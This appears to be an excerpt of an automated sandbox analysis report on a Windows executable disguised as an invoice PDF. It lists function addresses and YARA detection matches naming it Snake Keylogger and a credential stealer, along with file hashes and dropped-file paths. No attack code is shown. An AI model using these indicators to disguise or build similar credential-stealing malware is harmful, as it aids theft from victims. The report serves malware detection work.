Source: C:\Users\user\Desktop\Invoice No 1122207 pdf.exe	Code function: 0_2_0044676B	0_2_0044676B
Source: C:\Users\user\Desktop\Invoice No 1122207 pdf.exe	Code function: 0_2_004A4873	0_2_004A4873
Source: C:\Users\user\Desktop\Invoice No 1122207 pdf.exe	Code function: 0_2_0041CAF0	0_2_0041CAF0
Source: C:\Users\user\Desktop\Invoice No 1122207 pdf.exe	Code function: 0_2_0043CAA0	0_2_0043CAA0
Source: C:\Users\user\Desktop\Invoice No 1122207 pdf.exe	Code function: 0_2_0042CC39	0_2_0042CC39
Source: C:\Users\user\Desktop\Invoice No 1122207 pdf.exe	Code function: 0_2_00446DD9	0_2_00446DD9
Source: C:\Users\user\Desktop\Invoice No 1122207 pdf.exe	Code function: 0_2_0042B119	0_2_0042B119
Source: C:\Users\user\Desktop\Invoice No 1122207 pdf.exe	Code function: 0_2_004191C0	0_2_004191C0
Source: C:\Users\user\Desktop\Invoice No 1122207 pdf.exe	Code function: 0_2_00431394	0_2_00431394
Source: C:\Users\user\Desktop\Invoice No 1122207 pdf.exe	Code function: 0_2_00431706	0_2_00431706
Source: C:\Users\user\Desktop\Invoice No 1122207 pdf.exe	Code function: 0_2_0043781B	0_2_0043781B
Source: C:\Users\user\Desktop\Invoice No 1122207 pdf.exe	Code function: 0_2_0042997D	0_2_0042997D
Source: C:\Users\user\Desktop\Invoice No 1122207 pdf.exe	Code function: 0_2_00417920	0_2_00417920
Source: C:\Users\user\Desktop\Invoice No 1122207 pdf.exe	Code function: 0_2_004319B0	0_2_004319B0
Source: C:\Users\user\Desktop\Invoice No 1122207 pdf.exe	Code function: 0_2_00437A4A	0_2_00437A4A
Source: C:\Users\user\Desktop\Invoice No 1122207 pdf.exe	Code function: 0_2_00431C77	0_2_00431C77
Source: C:\Users\user\Desktop\Invoice No 1122207 pdf.exe	Code function: 0_2_00437CA7	0_2_00437CA7
Source: C:\Users\user\Desktop\Invoice No 1122207 pdf.exe	Code function: 0_2_0049BE44	0_2_0049BE44
Source: C:\Users\user\Desktop\Invoice No 1122207 pdf.exe	Code function: 0_2_00449EEE	0_2_00449EEE
Source: C:\Users\user\Desktop\Invoice No 1122207 pdf.exe	Code function: 0_2_0041BF40	0_2_0041BF40
Source: C:\Users\user\Desktop\Invoice No 1122207 pdf.exe	Code function: 0_2_00431F32	0_2_00431F32
Source: C:\Users\user\Desktop\Invoice No 1122207 pdf.exe	Code function: 0_2_0122BF70	0_2_0122BF70
Source: C:\Users\user\AppData\Local\supergroup\ageless.exe	Code function: 7_2_00AF8060	7_2_00AF8060
Source: C:\Users\user\AppData\Local\supergroup\ageless.exe	Code function: 7_2_00B62046	7_2_00B62046
Source: C:\Users\user\AppData\Local\supergroup\ageless.exe	Code function: 7_2_00B58298	7_2_00B58298
Source: C:\Users\user\AppData\Local\supergroup\ageless.exe	Code function: 7_2_00B2E4FF	7_2_00B2E4FF
Source: C:\Users\user\AppData\Local\supergroup\ageless.exe	Code function: 7_2_00B2676B	7_2_00B2676B
Source: C:\Users\user\AppData\Local\supergroup\ageless.exe	Code function: 7_2_00B84873	7_2_00B84873
Source: C:\Users\user\AppData\Local\supergroup\ageless.exe	Code function: 7_2_00B1CAA0	7_2_00B1CAA0
Source: C:\Users\user\AppData\Local\supergroup\ageless.exe	Code function: 7_2_00AFCAF0	7_2_00AFCAF0
Source: C:\Users\user\AppData\Local\supergroup\ageless.exe	Code function: 7_2_00B0CC39	7_2_00B0CC39
Source: C:\Users\user\AppData\Local\supergroup\ageless.exe	Code function: 7_2_00B26DD9	7_2_00B26DD9
Source: C:\Users\user\AppData\Local\supergroup\ageless.exe	Code function: 7_2_00AF91C0	7_2_00AF91C0
Source: C:\Users\user\AppData\Local\supergroup\ageless.exe	Code function: 7_2_00B0B119	7_2_00B0B119
Source: C:\Users\user\AppData\Local\supergroup\ageless.exe	Code function: 7_2_00B11394	7_2_00B11394
Source: C:\Users\user\AppData\Local\supergroup\ageless.exe	Code function: 7_2_00B11706	7_2_00B11706
Source: C:\Users\user\AppData\Local\supergroup\ageless.exe	Code function: 7_2_00B1781B	7_2_00B1781B
Source: C:\Users\user\AppData\Local\supergroup\ageless.exe	Code function: 7_2_00B119B0	7_2_00B119B0
Source: C:\Users\user\AppData\Local\supergroup\ageless.exe	Code function: 7_2_00AF7920	7_2_00AF7920
Source: C:\Users\user\AppData\Local\supergroup\ageless.exe	Code function: 7_2_00B0997D	7_2_00B0997D
Source: C:\Users\user\AppData\Local\supergroup\ageless.exe	Code function: 7_2_00B17A4A	7_2_00B17A4A
Source: C:\Users\user\AppData\Local\supergroup\ageless.exe	Code function: 7_2_00B17CA7	7_2_00B17CA7
Source: C:\Users\user\AppData\Local\supergroup\ageless.exe	Code function: 7_2_00B11C77	7_2_00B11C77
Source: C:\Users\user\AppData\Local\supergroup\ageless.exe	Code function: 7_2_00B29EEE	7_2_00B29EEE
Source: C:\Users\user\AppData\Local\supergroup\ageless.exe	Code function: 7_2_00B7BE44	7_2_00B7BE44
Source: C:\Users\user\AppData\Local\supergroup\ageless.exe	Code function: 7_2_00B11F32	7_2_00B11F32
Source: C:\Users\user\AppData\Local\supergroup\ageless.exe	Code function: 7_2_019CBBA0	7_2_019CBBA0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 8_2_02E182F1	8_2_02E182F1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 8_2_02E1D25E	8_2_02E1D25E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 8_2_02E15370	8_2_02E15370
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 8_2_02E161E1	8_2_02E161E1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 8_2_02E164B9	8_2_02E164B9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 8_2_02E1D5A5	8_2_02E1D5A5
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 8_2_02E18A58	8_2_02E18A58
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 8_2_02E15971	8_2_02E15971
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 8_2_02E13E09	8_2_02E13E09
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 8_2_02E15F19	8_2_02E15F19
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 8_2_02E1FC49	8_2_02E1FC49
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 8_2_02E15C38	8_2_02E15C38
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 8_2_02E1EC18	8_2_02E1EC18
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 8_2_02E1D2D9	8_2_02E1D2D9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 8_2_02E1F7F0	8_2_02E1F7F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 8_2_02E1EC11	8_2_02E1EC11
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 8_2_0693A5E0	8_2_0693A5E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 8_2_0693ACC8	8_2_0693ACC8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 8_2_06930B30	8_2_06930B30
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 8_2_0693F588	8_2_0693F588
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 8_2_06939E88	8_2_06939E88
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 8_2_0693E738	8_2_0693E738
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 8_2_0693E748	8_2_0693E748
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 8_2_0693A5DA	8_2_0693A5DA
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 8_2_0693E2F0	8_2_0693E2F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 8_2_0693E2E3	8_2_0693E2E3
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 8_2_069383D0	8_2_069383D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 8_2_069383E0	8_2_069383E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 8_2_0693003F	8_2_0693003F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 8_2_06930040	8_2_06930040
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 8_2_0693ECD8	8_2_0693ECD8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 8_2_0693ECC8	8_2_0693ECC8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 8_2_06930B2D	8_2_06930B2D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 8_2_0693D5DB	8_2_0693D5DB
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 8_2_0693D5E8	8_2_0693D5E8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 8_2_0693F579	8_2_0693F579
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 8_2_0693F130	8_2_0693F130
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 8_2_0693F121	8_2_0693F121
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 8_2_0693DE98	8_2_0693DE98
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 8_2_0693DE8F	8_2_0693DE8F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 8_2_06939E78	8_2_06939E78
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 8_2_0693DA40	8_2_0693DA40
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 8_2_0693F9E2	8_2_0693F9E2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 8_2_0693F9E0	8_2_0693F9E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 8_2_069D7700	8_2_069D7700
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 8_2_069D7A20	8_2_069D7A20
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 8_2_069DF0E0	8_2_069DF0E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 8_2_069D0680	8_2_069D0680
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 8_2_069DCE80	8_2_069DCE80
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 8_2_069D3EAF	8_2_069D3EAF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 8_2_069D86A0	8_2_069D86A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 8_2_069DBED3	8_2_069DBED3
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 8_2_069D3EC0	8_2_069D3EC0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 8_2_069DBEE0	8_2_069DBEE0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 8_2_069D1610	8_2_069D1610
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 8_2_069D5E00	8_2_069D5E00
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 8_2_069D1620	8_2_069D1620
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 8_2_069DDE20	8_2_069DDE20
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 8_2_069D9640	8_2_069D9640
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 8_2_069D4E60	8_2_069D4E60
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 8_2_069D1F80	8_2_069D1F80
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 8_2_069DE780	8_2_069DE780
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 8_2_069D9FA0	8_2_069D9FA0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 8_2_069D57C0	8_2_069D57C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 8_2_069D8FF0	8_2_069D8FF0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 8_2_069D0FE0	8_2_069D0FE0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 8_2_069DD7E0	8_2_069DD7E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 8_2_069D2F20	8_2_069D2F20
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 8_2_069DAF40	8_2_069DAF40
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 8_2_069D6760	8_2_069D6760
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 8_2_069D9C80	8_2_069D9C80
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 8_2_069D54A0	8_2_069D54A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 8_2_069D8CCF	8_2_069D8CCF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 8_2_069D0CC0	8_2_069D0CC0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 8_2_069DD4C0	8_2_069DD4C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 8_2_069D8CE0	8_2_069D8CE0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 8_2_069D2C00	8_2_069D2C00
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 8_2_069DAC20	8_2_069DAC20
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 8_2_069DE450	8_2_069DE450
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 8_2_069D6440	8_2_069D6440
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 8_2_069D1C60	8_2_069D1C60
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 8_2_069DE460	8_2_069DE460
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 8_2_069DB580	8_2_069DB580
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 8_2_069D6DA0	8_2_069D6DA0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 8_2_069D25C0	8_2_069D25C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 8_2_069DEDC0	8_2_069DEDC0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 8_2_069DA5E0	8_2_069DA5E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 8_2_069D4500	8_2_069D4500
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 8_2_069D7D3B	8_2_069D7D3B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 8_2_069DC520	8_2_069DC520
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 8_2_069D7D40	8_2_069D7D40
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 8_2_069D3560	8_2_069D3560
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 8_2_069D6A80	8_2_069D6A80
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 8_2_069DA2B0	8_2_069DA2B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 8_2_069D22A0	8_2_069D22A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 8_2_069DEAA0	8_2_069DEAA0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 8_2_069DA2C0	8_2_069DA2C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 8_2_069D5AE0	8_2_069D5AE0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 8_2_069DC200	8_2_069DC200
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 8_2_069D3240	8_2_069D3240
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 8_2_069DB260	8_2_069DB260
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 8_2_069D8380	8_2_069D8380
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 8_2_069D3BA0	8_2_069D3BA0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 8_2_069DBBC0	8_2_069DBBC0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 8_2_069D73E0	8_2_069D73E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 8_2_069D1300	8_2_069D1300
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 8_2_069DDB00	8_2_069DDB00
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 8_2_069D9320	8_2_069D9320
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 8_2_069DCB50	8_2_069DCB50
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 8_2_069D4B40	8_2_069D4B40
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 8_2_069D0360	8_2_069D0360
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 8_2_069DCB60	8_2_069DCB60
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 8_2_069DB890	8_2_069DB890
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 8_2_069D3880	8_2_069D3880
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 8_2_069DB8A0	8_2_069DB8A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 8_2_069D70C0	8_2_069D70C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 8_2_069D28E0	8_2_069D28E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 8_2_069D0006	8_2_069D0006
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 8_2_069D9000	8_2_069D9000
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 8_2_069D4820	8_2_069D4820
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 8_2_069D0040	8_2_069D0040
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 8_2_069DC840	8_2_069DC840
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 8_2_069D8060	8_2_069D8060
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 8_2_069D5180	8_2_069D5180
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 8_2_069D09A0	8_2_069D09A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 8_2_069DD1A0	8_2_069DD1A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 8_2_069D41D0	8_2_069D41D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 8_2_069D89C0	8_2_069D89C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 8_2_069D41E0	8_2_069D41E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 8_2_069DA900	8_2_069DA900
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 8_2_069D1930	8_2_069D1930
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 8_2_069D6120	8_2_069D6120
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 8_2_069D1940	8_2_069D1940
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 8_2_069DE140	8_2_069DE140
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 8_2_069D9960	8_2_069D9960
Source: C:\Users\user\AppData\Local\supergroup\ageless.exe	Code function: 10_2_01AA0138	10_2_01AA0138
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 11_2_0246D2CA	11_2_0246D2CA
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 11_2_0246B2E8	11_2_0246B2E8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 11_2_02465370	11_2_02465370
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 11_2_02468008	11_2_02468008
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 11_2_024661D8	11_2_024661D8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 11_2_02468630	11_2_02468630
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 11_2_0246D599	11_2_0246D599
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 11_2_02465968	11_2_02465968
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 11_2_02465F07	11_2_02465F07
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 11_2_0246CFA8	11_2_0246CFA8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 11_2_0246FC49	11_2_0246FC49
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 11_2_0246EC18	11_2_0246EC18
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 11_2_02465C38	11_2_02465C38
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 11_2_0246F7F0	11_2_0246F7F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 11_2_02463AA1	11_2_02463AA1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 11_2_024629EC	11_2_024629EC
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 11_2_02463E09	11_2_02463E09
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 11_2_0246CFF8	11_2_0246CFF8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 11_2_0246EC0A	11_2_0246EC0A

Source: C:\Users\user\Desktop\Invoice No 1122207 pdf.exe	Code function: String function: 00430A30 appears 46 times
Source: C:\Users\user\Desktop\Invoice No 1122207 pdf.exe	Code function: String function: 00419CB3 appears 31 times
Source: C:\Users\user\Desktop\Invoice No 1122207 pdf.exe	Code function: String function: 0042F9F2 appears 40 times
Source: C:\Users\user\AppData\Local\supergroup\ageless.exe	Code function: String function: 00B10A30 appears 46 times
Source: C:\Users\user\AppData\Local\supergroup\ageless.exe	Code function: String function: 00AF9CB3 appears 31 times
Source: C:\Users\user\AppData\Local\supergroup\ageless.exe	Code function: String function: 00B0F9F2 appears 40 times

Source: Invoice No 1122207 pdf.exe

Static PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE

Source: 10.2.ageless.exe.1600000.1.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 10.2.ageless.exe.1600000.1.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 10.2.ageless.exe.1600000.1.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 7.2.ageless.exe.1580000.1.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 7.2.ageless.exe.1580000.1.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 7.2.ageless.exe.1580000.1.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 10.2.ageless.exe.1600000.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 10.2.ageless.exe.1600000.1.raw.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 10.2.ageless.exe.1600000.1.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
